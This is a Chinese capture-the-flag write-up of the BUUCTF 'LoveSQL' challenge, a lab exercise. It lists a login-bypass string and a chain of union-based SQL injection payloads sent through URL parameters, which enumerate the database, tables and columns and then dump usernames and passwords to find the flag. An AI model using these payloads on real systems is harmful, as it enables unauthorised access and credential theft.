BUU WEB [极客大挑战 2019]LoveSQL

根据题目的名字,明显是一个SQL注入的题目,打开网页,发现是一个登陆界面,先测试一下注入点,用常用的“ ’ "试试,成功。接下来用万能密码登陆:

1' or 1=1#

随便输进去一个,另外一个填什么都可以。
在这里插入图片描述
并没有得到flag,观察URL,是以get传参的方式来注入的。近下来就是常规的先用order by来爆出有多少个字段,当尝试到4时报错,说明有3个字段:

1' order by 3# //当在url中进行时#为%23,密码随便输

在这里插入图片描述

接下来就是用联合查询找出回显点了(以下均为在url中注入,登录框太短看着不方便),

?username=1' union select 1,2,3%23&password=ads

在这里插入图片描述

得到回显点为2、3;

然后爆出数据库名:

?username=1' union select 1,database(),2%23&password=ads

在这里插入图片描述
得到数据库名为greet;

接着就该爆出表了:

?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads

在这里插入图片描述
得到两个表的名字:geekuser 和 l0ve1ysq1;

接着爆字段:

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=ads

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads

在这里插入图片描述
两个表爆出的字段是一样的,最后就是爆出两个表中的数据了:

?username=1' union select 1,database(),group_concat(id,username,password) from geekuser%23&password=ads

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads

分别爆出两个表内的数据,就可以找到flag了。注意,flag在第二个表中,注意找哦。

关于常规的回显注入可以参考一下这篇文章:

https://www.cnblogs.com/ihacker/p/11055191.html

若作者介意请私信联系删除!!!

已标记关键词 清除标记
相关推荐
课程简介: 历经半个多月的时间,Debug亲自撸的 “企业员工角色权限管理平台” 终于完成了。正如字面意思,本课程讲解的是一个真正意义上的、企业级的项目实战,主要介绍了企业级应用系统中后端应用权限的管理,其中主要涵盖了六大核心业务模块、十几张数据库表。 其中的核心业务模块主要包括用户模块、部门模块、岗位模块、角色模块、菜单模块和系统日志模块;与此同时,Debug还亲自撸了额外的附属模块,包括字典管理模块、商品分类模块以及考勤管理模块等等,主要是为了更好地巩固相应的技术栈以及企业应用系统业务模块的开发流程! 核心技术栈列表: 值得介绍的是,本课程在技术栈层面涵盖了前端和后端的大部分常用技术,包括Spring Boot、Spring MVC、Mybatis、Mybatis-Plus、Shiro(身份认证与资源授权跟会话等等)、Spring AOP、防止XSS攻击、防止SQL注入攻击、过滤器Filter、验证码Kaptcha、热部署插件Devtools、POI、Vue、LayUI、ElementUI、JQuery、HTML、Bootstrap、Freemarker、一键打包部署运行工具Wagon等等,如下图所示: 课程内容与收益: 总的来说,本课程是一门具有很强实践性质的“项目实战”课程,即“企业应用员工角色权限管理平台”,主要介绍了当前企业级应用系统中员工、部门、岗位、角色、权限、菜单以及其他实体模块的管理;其中,还重点讲解了如何基于Shiro的资源授权实现员工-角色-操作权限、员工-角色-数据权限的管理;在课程的最后,还介绍了如何实现一键打包上传部署运行项目等等。如下图所示为本权限管理平台的数据库设计图: 以下为项目整体的运行效果截图: 值得一提的是,在本课程中,Debug也向各位小伙伴介绍了如何在企业级应用系统业务模块的开发中,前端到后端再到数据库,最后再到服务器的上线部署运行等流程,如下图所示:
©️2020 CSDN 皮肤主题: 游动-白 设计师:白松林 返回首页